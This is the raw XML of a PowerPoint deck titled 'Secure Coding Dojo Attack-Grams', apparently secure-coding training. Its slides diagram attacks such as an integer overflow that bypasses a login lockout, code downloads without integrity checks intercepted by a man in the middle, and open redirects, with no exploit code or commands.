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2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wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image19.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image18.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image9.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image20.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image8.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image17.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image12.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image35.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image3.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image13.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image36.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image4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11.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image2.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image34.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image7.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image16.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image10.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image1.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image33.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image38.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image6.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image15.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image37.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image5.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image14.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image21.png" ContentType="image/png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26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13.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide25.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide1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25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24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2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_rels/notesSlide11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notesSlide1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</p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId14"/>
  </p:notes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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId4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dt" idx="3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6" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="3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7" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="3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6DBA0626-76F5-4513-8845-E541AAFCAB1E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5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6" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="40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6EF7594-A05A-4369-9FD5-4C23365B5560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53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2" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="42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3CFBF68-D67D-4444-9D5B-28C7285ACD53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5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9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BA68720-0878-4693-8C8F-7AEC33551585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621720" cy="20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5623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1262520" y="1604520"/>
            <a:ext cx="621720" cy="20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5623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/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1829520"/>
            <a:ext cx="1274040" cy="20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8122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2CA7D64-3473-4B8B-933D-608428966D1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9DBB470D-90AB-4FEB-9F10-0AE84A9A9A6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621720" cy="20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5623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1262520" y="1604520"/>
            <a:ext cx="621720" cy="43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997" lnSpcReduction="1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609480" y="1829520"/>
            <a:ext cx="621720" cy="20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5623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3F66D99E-A2DD-4899-B85F-F57AEB84C5B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621720" cy="43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997" lnSpcReduction="1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1262520" y="1604520"/>
            <a:ext cx="621720" cy="20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5623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/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262520" y="1829520"/>
            <a:ext cx="621720" cy="20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5623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6A4CA710-1F27-410A-974A-5979890E252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274040" cy="20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8122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09480" y="1829520"/>
            <a:ext cx="1274040" cy="20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8122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C51EDCE-86E0-4701-A850-B6D6463CC6E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621720" cy="20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5623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1262520" y="1604520"/>
            <a:ext cx="621720" cy="20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5623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609480" y="1829520"/>
            <a:ext cx="621720" cy="20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5623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1262520" y="1829520"/>
            <a:ext cx="621720" cy="20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5623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7A401A1-38E8-47D0-8770-BE7F02F97B9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3B65CC6B-A1A1-4A87-8CE1-29C2223CBC3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D253E572-908D-4DE3-B6D3-00673DEBB9A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274040" cy="43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687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1019C990-ACA6-4AF8-B2AD-389E1FA11AF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274040" cy="43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687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B28DC8BB-11E4-4E39-B016-CAD16503214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621720" cy="43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997" lnSpcReduction="1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1262520" y="1604520"/>
            <a:ext cx="621720" cy="43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4997" lnSpcReduction="1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02A7D909-2B88-4803-9AD6-ACFAEC9F584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7090F38E-4B90-4C75-8CF7-7FDB5193CE1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274040" cy="43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1947960" y="1604520"/>
            <a:ext cx="1274040" cy="43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609480" y="2076840"/>
            <a:ext cx="2611800" cy="43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83EA0F2-995D-4954-B88E-908FCEBCE325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E232395-283C-4F5A-8BFC-E1B2AD29E8EE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274040" cy="43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1947960" y="1604520"/>
            <a:ext cx="1274040" cy="90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2076840"/>
            <a:ext cx="1274040" cy="43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E1FFB32-85D0-4001-B292-8A3F57A6F8FF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274040" cy="90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1947960" y="1604520"/>
            <a:ext cx="1274040" cy="43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1947960" y="2076840"/>
            <a:ext cx="1274040" cy="43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ftr" idx="34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sldNum" idx="35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A714450-2936-49C5-B4C4-9662FC875E53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dt" idx="36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2611800" cy="43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2076840"/>
            <a:ext cx="2611800" cy="43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939EF9A-9BD8-4657-908B-4F93FEC8FA6D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PlaceHolder 6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274040" cy="43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1947960" y="1604520"/>
            <a:ext cx="1274040" cy="43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2076840"/>
            <a:ext cx="1274040" cy="43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5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947960" y="2076840"/>
            <a:ext cx="1274040" cy="43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6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PlaceHolder 7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0CD9723-1BE6-4B52-ADE2-0BA3A32431BA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8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62364ED-1F1D-4B11-AAE4-2DA982DC194D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687F827-E210-4A02-BEAD-A5EDD8C73D71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2611800" cy="90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8BAB769-0FE5-4E8D-95C8-F3E7850C6429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2611800" cy="90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328F8E1-46B7-4259-B746-621F04BFF568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274040" cy="90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947960" y="1604520"/>
            <a:ext cx="1274040" cy="90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67AE85B-944D-470B-9F54-4C92EDBE2393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" name="PlaceHolder 6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sldNum" idx="26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E10C0B8-E0B2-49BB-82B6-AF000F0674A8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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.wmf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2.wmf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Relationship Id="rId7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image" Target="../media/image22.wmf"/><Relationship Id="rId7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Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.wmf"/><Relationship Id="rId7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2.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId10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2.wmf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.wmf"/><Relationship Id="rId4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2.wmf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4.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId10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image" Target="../media/image22.wmf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png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId2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38.png"/><Relationship Id="rId8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image" Target="../media/image22.wmf"/><Relationship Id="rId4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image" Target="../media/image22.wmf"/><Relationship Id="rId4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image" Target="../media/image22.wmf"/><Relationship Id="rId4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image" Target="../media/image22.wmf"/><Relationship Id="rId4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image" Target="../media/image22.wmf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2.wmf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2.wmf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.wmf"/><Relationship Id="rId5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5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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.wmf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5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5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12189960" cy="6855840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic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750600" y="678240"/>
            <a:ext cx="10513440" cy="2144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666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6600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff">
                    <a:alpha val="79000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;Secure Coding Dojo/&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="6600"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="6600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff">
                    <a:alpha val="79000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>Attack-Grams</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6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Title 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750600" y="3247200"/>
            <a:ext cx="11103120" cy="127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2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff">
                    <a:alpha val="58000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>A set of simple diagrams describing various attacks that leverage software flaws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2253600" y="48420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Integer Overflow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7" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3661920" y="1646640"/>
            <a:ext cx="716400" cy="870840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556800" y="2519280"/>
            <a:ext cx="802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/login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9" name="Graphic 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914040" y="1606680"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="843840" y="2530800"/>
            <a:ext cx="1074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Attacker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41" name="Straight Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278360" y="2851920"/>
            <a:ext cx="10800" cy="3194280"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="a5a5a5"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="242" name="Straight Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3908880" y="2854800"/>
            <a:ext cx="10800" cy="3191400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="a5a5a5"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="243" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278360" y="3233880"/>
            <a:ext cx="2632680" cy="2160"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316960" y="2904480"/>
            <a:ext cx="1392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Credentials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45" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1270080" y="3248640"/>
            <a:ext cx="2649600" cy="855720"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="4472c4"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="TextBox 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20570400">
            <a:off x="1152000" y="3517200"/>
            <a:ext cx="1929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Account Locked!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47" name="Straight Arrow Connector 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270800" y="4127040"/>
            <a:ext cx="2648880" cy="2160"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316960" y="3800880"/>
            <a:ext cx="1392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Credentials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49" name="Straight Arrow Connector 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1269360" y="4158000"/>
            <a:ext cx="2641680" cy="870480"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="4472c4"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20563200">
            <a:off x="1153080" y="4420440"/>
            <a:ext cx="1929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Account Locked!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TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2392200" y="2512440"/>
            <a:ext cx="371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…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52" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1287000" y="5034960"/>
            <a:ext cx="2632680" cy="2160"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="TextBox 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316960" y="4698360"/>
            <a:ext cx="1392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Credentials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54" name="Straight Arrow Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1269360" y="5080680"/>
            <a:ext cx="2641680" cy="770040"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="70ad47"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="TextBox 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20638200">
            <a:off x="1099080" y="5279760"/>
            <a:ext cx="2061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Login authorized!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Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4078440" y="3942720"/>
            <a:ext cx="3579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Helvetica Neue"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>attempts = 32767 (MAX_SHORT)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Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="4850640"/>
            <a:ext cx="4213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a94442"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>attempts = -32768 (&lt; MAX_ATTEMPTS)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Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4092120" y="3054240"/>
            <a:ext cx="2052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Helvetica Neue"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>attempts = 32766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9" name="Curved Connector 37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="260" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="10800000">
            <a:off x="1245240" y="2266560"/>
            <a:ext cx="871200" cy="2905920"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30673"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="123825">
            <a:solidFill>
              <a:srgbClr val="767171">
                <a:alpha val="31000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp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851040" y="59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Download of Code Without </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:b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Integrity Check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Cube 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1245600" y="1602720"/>
            <a:ext cx="868320" cy="1328400"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst>
              <a:gd name="adj" fmla="val 25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pic>
        <p:nvPicPr>
          <p:cNvPr id="262" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3555720" y="1881360"/>
            <a:ext cx="716400" cy="870840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="263" name="Graphic 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163880" y="4695120"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298520" y="5654160"/>
            <a:ext cx="681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User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TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3344400" y="2754360"/>
            <a:ext cx="1132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Software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6" name="Graphic 17" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4411800" y="3188880"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="267" name="Picture 19" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3555720" y="4478400"/>
            <a:ext cx="716400" cy="924120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3359520" y="5325840"/>
            <a:ext cx="1101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Malware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TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="865440" y="2940120"/>
            <a:ext cx="20754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Download Server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(Not Secure)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TextBox 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377680" y="3300480"/>
            <a:ext cx="95364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Man-in-the-middle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1676520" y="568800"/>
            <a:ext cx="10513440" cy="54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7222" lnSpcReduction="10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Open Redirect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2" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4230360" y="1460160"/>
            <a:ext cx="716400" cy="924120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="273" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507320" y="1431720"/>
            <a:ext cx="716400" cy="870840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915120" y="2275200"/>
            <a:ext cx="19486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www.trusted.good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TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
